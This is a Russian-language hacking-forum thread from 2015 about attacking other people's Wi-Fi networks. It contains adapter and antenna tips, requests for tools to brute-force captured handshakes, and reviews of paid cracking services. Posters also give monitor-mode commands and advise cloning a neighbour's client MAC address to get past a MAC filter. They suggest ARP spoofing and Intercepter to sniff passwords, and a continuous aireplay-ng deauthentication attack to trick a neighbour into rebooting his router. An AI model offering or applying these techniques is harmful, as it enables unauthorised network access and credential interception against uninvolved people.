Возьми адаптер на RTL8187, выбирай из моделей которые себя зарекомендовали. Мне хватает прикупленной всенаправленной антенны Alfa 9dbi, точек много рядом.
Вопросы, с адаптерами нужно в этой теме задавать.
http://forum.antichat.ru/threads/57249/
Спасибо, выберу пожалуй тоже Альфу на RTL8187L.
А никто не знает когда уже начнут массово подобные(Альфе) адаптеры для 5GHz диапазона штамповать?
Vikhedgehog
20.06.2015, 03:05
Спасибо, выберу пожалуй тоже Альфу на RTL8187L.
А никто не знает когда уже начнут массово подобные(Альфе) адаптеры для 5GHz диапазона штамповать?
Есть AWUS051NH, и вроде как даже работает.
Vikhedgehog
20.06.2015, 13:50
А кстати подскажите, вот есть у меня старенький TL-WN722N который служит мне уже 3 года, к нему подключаю направленную антенну 6dbi. Но вот проблема, где я живу происходит переизбыток сетей (они даже все не вмещаются на экран компа при минимальном размере текста). Эфир с каждым годом становится все более забитым, и в некоторых комнатах в этом году можно подключиться разве что только к сетям за стенкой. Остальные как правило вообще меня не слышут, а те которые слышат дают сбой при проверке пинов. Если я куплю альфу и подключу к ней новую антенну с более высоким dbi, удастся ли мне 'пробить' помехи или тут уже ничего не сделать?
А кстати подскажите, вот есть у меня старенький TL-WN722N который служит мне уже 3 года, к нему подключаю направленную антенну 6dbi. Но вот проблема, где я живу происходит переизбыток сетей (они даже все не вмещаются на экран компа при минимальном размере текста). Эфир с каждым годом становится все более забитым, и в некоторых комнатах в этом году можно подключиться разве что только к сетям за стенкой. Остальные как правило вообще меня не слышут, а те которые слышат дают сбой при проверке пинов. Если я куплю альфу и подключу к ней новую антенну с более высоким dbi, удастся ли мне 'пробить' помехи или тут уже ничего не сделать?
Тут скорее может помочь направленная антенна, лишних помех она ловить меньше будет будет в разы.
Посоветуйте пожалуйста программу для брута cap файлов, желательно по проще и работающую в винде.
Заранее спасибо!
Есть AWUS051NH, и вроде как даже работает.
Ага, я вкурсе, я имел ввиду, когда уже перестанут штамповать адаптеры только для одного диапазона и будут штамповать только двухдиапазонные адаптеры?
Вездесущий
21.06.2015, 16:44
Доброго времени суток форумчане и гости. У меня есть две точки с одинаковым названием (изначально они по разному назывались 98 и F4). Одну из них не видно в винде F4 а под линуксом все точки видно с разным сигналом (раньше заходил на обе под виндой и линукс). Захожу под линуксом на F4, авторизируюсь но на вебморду маршрутизатора не то что не могу попасть, а она вроде как загрузилась, только без кнопок и прочего. Маршрутизатор TP-LINK. И эта F4 пропала из списка в винде, хотелось бы ее видеть. Заранее благодарен.
Посоветуйте пожалуйста программу для брута cap файлов, желательно по проще и работающую в винде.
Заранее спасибо!
EWSA
Ага, я вкурсе, я имел ввиду, когда уже перестанут штамповать адаптеры только для одного диапазона и будут штамповать только двухдиапазонные адаптеры?
AWUS051NH "802.11n, частота 2.4 / 5 ГГц, возможность одновременной работы в двух диапазонах".
Вездесущий
22.06.2015, 07:54
Доброго времени суток форумчане и гости. У меня есть две точки с одинаковым названием (изначально они по разному назывались 98 и F4). Одну из них не видно в винде F4 а под линуксом все точки видно с разным сигналом (раньше заходил на обе под виндой и линукс). Захожу под линуксом на F4, авторизируюсь но на вебморду маршрутизатора не то что не могу попасть, а она вроде как загрузилась, только без кнопок и прочего. Маршрутизатор TP-LINK. И эта F4 пропала из списка в винде, хотелось бы ее видеть. Заранее благодарен.
Хотелось бы знать, что произошло с маршрутизатором F4. Винда по прежнему его не видит. И еще когда заходил на морду маршрутизатора, затем переключался на другую точку такого-же TP-LINK, после обновления страницы попадал на другую морду без авторизации (логин пароль по дефолту у обеих с 98 на F4 и на оборот). Люди добрые у кого какие версии на этот счет.
Подскажите, возможно ли как то определить до покупки б/у Альфы его состояние (погорел ли он от статики и т.п.) Возможно как то правильно задать вопрос продавцу?
Вездесущий
22.06.2015, 10:27
Разобрался с 98 и F4 появился F4 под виндой!
Кто-нибудь пользовался этим сервисом http://xsrc.ru
После оплаты реально выдаст пароль или развод?
Подскажите, возможно ли как то определить до покупки б/у Альфы его состояние (погорел ли он от статики и т.п.) Возможно как то правильно задать вопрос продавцу?
Если покупаешь с рук то лучше возьми с собой ноутбук/нетбук и проверь непосредственно при покупке, и при созвоне с продавцом спроси состояние и предупреди что будешь провереять во время покупки, да еще не лишним будет узнать про манибэк в случае неисправности в течении определенного срока.
Вездесущий
22.06.2015, 18:33
Кто-нибудь пользовался этим сервисом http://xsrc.ru
После оплаты реально выдаст пароль или развод?
У них основная масса в процессе перебора это за вчерашний вечер и не только... +за это еще и бабки платить ... Извените пароль должен подбираться за час при отличных раскладах... Мне здесь пароль за полчаса выдали ВОТ люди работают когда есть желание. Пользуясь моментом хочу поблагодорить всех, кто хотя бы скачивал, то что я заливаю, а особенная благодарность за скорость найденного паса... Иногда это очень важно! ТАК ДЕРЖАТЬ!
У них основная масса в процессе перебора это за вчерашний вечер и не только... +за это еще и бабки платить ... Извените пароль должен подбираться за час при отличных раскладах...
Дело не во времени, здесь я скидывал один хендшейк, прошло уже 4 дня, ответа нет... Даже не знаю сканил ли его вообще кто или нет, хоть бы отписали. На том сервисе через пару часов пароль был найден. Вопрос в другом, не развод ли это? Ты пользовался этим сервисом?
Вездесущий
22.06.2015, 20:08
Дело не во времени, здесь я скидывал один хендшейк, прошло уже 4 дня, ответа нет... Даже не знаю сканил ли его вообще кто или нет, хоть бы отписали. На том сервисе через пару часов пароль был найден. Вопрос в другом, не развод ли это? Ты пользовался этим сервисом?
Лично я нет! И не собираюсь, люди здесь отзывчивые, помогут... а так что надо можно найти ручками, вот только жаль мощи моего кампа не хватает... а для общего развития здесь инфы хватает! Зайди на файлообменник и посмотри...кто скачивал скок раз...
binarymaster
22.06.2015, 20:08
Кто-нибудь пользовался этим сервисом http://xsrc.ru
После оплаты реально выдаст пароль или развод?
Этот сервис раньше был бесплатным, пару паролей мне подобрал. ИМХО, ему можно верить.
Я этот сервис использую просто для проверки пароля в словарях. Если сервис нашел, очень хорошо, с 1 скачивания, тогда пароль не сложный, с 2 и более значит что то посложнее, но главное, сервис показал, что искомый пароль все таки есть в каком то из словарей и тогда можно брутить на своем дряхленьком ноуте или просить помощи здесь)
Всем КУ!
Обновил Kali linux:
1) sudo apt-get upgrade
2) sudo apt-get update
После чего решил пошалить с Wi-Fi через aircrack-ng и столкнулся с проблемой.
Ход действий:
1)sudo airmon-ng start wlan0 - и тут меня ждала засада!
sudo airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2031 dhclient
2318 NetworkManager
PHY Interface Driver Chipset
2)sudo airodump-ng mon0
sudo airodump-ng mon0
nl80211 not found
Interface mon0
ioctl(siocgifindex) failed no such device
В чем может быть проблема и как её устранить???
В зарание благодарствую!!!
erwerr2321
24.06.2015, 18:24
Всем КУ!
Обновил Kali linux:
1) sudo apt-get upgrade
2) sudo apt-get update
После чего решил пошалить с Wi-Fi через aircrack-ng и столкнулся с проблемой.
Ход действий:
1)sudo airmon-ng start wlan0 - и тут меня ждала засада!
sudo airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2031 dhclient
2318 NetworkManager
PHY Interface Driver Chipset
2)sudo airodump-ng mon0
sudo airodump-ng mon0
nl80211 not found
Interface mon0
ioctl(siocgifindex) failed no such device
В чем может быть проблема и как её устранить???
В зарание благодарствую!!!
Так убей процессы
2031 dhclient
2318 NetworkManager
, которые тебе мешают, и будет тебе счастье!
Или вообще попробуй не заморачиваться с этим airmon, а просто переведи свою карту в Monitor mode
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode Monitor
sudo ifconfig wlan0 up
sudo airodump-ng wlan0
Например...
Дело не во времени, здесь я скидывал один хендшейк, прошло уже 4 дня, ответа нет... Даже не знаю сканил ли его вообще кто или нет, хоть бы отписали. На том сервисе через пару часов пароль был найден. Вопрос в другом, не развод ли это? Ты пользовался этим сервисом?
Сервис не развод - инфа 100%.
Обратная связь с администрацией там тоже работает.
Подскажите какая самая норм прога для работы со словарями весом >20гб. Задача слить 3 словаря большого объема с удалением дублей. Пробовал True Sort Повис(
ChesteRock
25.06.2015, 16:25
Подскажите какая самая норм прога для работы со словарями весом >20гб. Задача слить 3 словаря большого объема с удалением дублей. Пробовал True Sort Повис(
Толку от больших словарей никакого. Только место на диске занимают. Словари нужно не увеличивать, а уменьшать и оптимизировать, а для остального есть маски и правила. ИМХО.
Согласен но тем не менее что то по стабильнее нужно в плане проги
Согласен но тем не менее что то по стабильнее нужно в плане проги
EmEditor Pro - работает с текстовыми файлами большого объема. Есть возможность сортировки и удаления дублей, поддерживается работа с регулярными выражениями.
Загляни сюда: http://forum.antichat.ru/threads/281655/page-15#post-3653880
спасибо за прогу, но нужно обрезать длинну слов от 8 до 9 (к примеру), и почистить от похожих слов типа abcd001, abcd002, abcd003. желательно прогу а не скрипт. заранее спасибо
ChesteRock
27.06.2015, 01:54
спасибо за прогу, но нужно обрезать длинну слов от 8 до 9 (к примеру), и почистить от похожих слов типа abcd001, abcd002, abcd003. желательно прогу а не скрипт. заранее спасибо
Unified List Manager - ULM
http://unifiedlm.com
fire-dance
28.06.2015, 03:59
эсле имеиш доступ на роутер морду как отключить 60 сек??
эсле имеиш доступ на роутер морду как отключить 60 сек??
Походу ни как, это в прошивке, если тока по тихому перепрошить
для какой цели web морду отключить?
Привет всем!
Вопрос по адаптерам..
Пользуюсь Alfa AWUS 036h 1000mw долбит метров на 100,хочется больше и направленную,желательно чтоб панельная размером примерно как ноут.
Желательно чтоб и с виндой 8 дружила)
Кто знает такое чудо то подскажите плз
Привет, можно ли как-то проследить за wifi, по каким сайтам кто ходит, пароли отловить там?
Привет, можно ли как-то проследить за wifi, по каким сайтам кто ходит, пароли отловить там?
Если не ошибаюсь можно как то снифануть если точка открытая и клиент не использует VPN.
программой Intercepter попробуйте
Привет, можно ли как-то проследить за wifi, по каким сайтам кто ходит, пароли отловить там?
Если ты подключился к роутеру то попробуй зайти как админ(если пароль и IP по умолчанию не поменяли) и можешь настроить чтобы логи к тебе на комп писались, есть еще вариант перехватывать(сниффить) траффик - вобщем в этом направлении копай.
Да можно. Щас даже HTTPS протокол можно подделать. Копай в сторону ARP spoofing
https://forum.antichat.ru/threads/345266/ Читай
Привет всем!
Вопрос по адаптерам..
Пользуюсь Alfa AWUS 036h 1000mw долбит метров на 100,хочется больше и направленную,желательно чтоб панельная размером примерно как ноут.<br/>
Желательно чтоб и с виндой 8 дружила)
Кто знает такое чудо то подскажите плз
Сам пользовался альфой, мощнее не нужно возьми направленную антенну и не парься. На 2.5 км ломал точки.
Всем привет дорогие форумчане, я хотел бы спросить, когда я пытаюсь подключится к сети ( сети соседа =) ) то мне пишет что " Не удаётся подключится к сети", я думаю что это из-за MAC фильтра, можно ли как то обойти эту защиту? Заранее спасибо =)
Всем привет дорогие форумчане, я хотел бы спросить, когда я пытаюсь подключится к сети ( сети соседа =) ) то мне пишет что " Не удаётся подключится к сети", я думаю что это из-за MAC фильтра, можно ли как то обойти эту защиту? Заранее спасибо =)
Попробуйте посмотреть клиентов сидящих на WIFI точке доступа соседа через airodump-ng. A затем склонируйте МАС адрес клиента через macchanger.
иногда такая ошибка получается из-за очень слабого сигнала, на каком уровне он у Вас?
binarymaster
30.06.2015, 00:08
Кстати, точки доступа Onlime (Upvel) через длительный период аптайма начинают подглючивать и отказывать в ассоциации. Помогает перезагрузка через веб интерфейс.
иногда такая ошибка получается из-за очень слабого сигнала, на каком уровне он у Вас?
Самый ближний роутер
-59
Кстати, точки доступа Onlime (Upvel) через длительный период аптайма начинают подглючивать и отказывать в ассоциации. Помогает перезагрузка через веб интерфейс.
Прикол в том что этот чувак вообще роутер не выключает и не перезагружает
Прикол в том что этот чувак вообще роутер не выключает и не перезагружает
Самый ближний роутер
-59
Самый ближний роутер
-59
Прикол в том что этот чувак вообще роутер не выключает и не перезагружает
Включи логику. Если чувак юзает wifi и не перезагружает роутер, то нужно сделать так чтобы он перезапустил. Для этого используй aireplay-ng c атрибутом -0 0 чтобы он не смог подключиться к своей точке, он подумает на глюк роутера и перезапустит его)
Для этого используй aireplay-ng
Или, я делаю вход на вэб-инфейс и сам перезагружаю.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot